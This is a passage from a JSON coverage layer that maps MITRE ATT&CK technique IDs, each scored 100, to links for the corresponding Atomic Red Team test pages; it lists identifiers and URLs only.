omment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled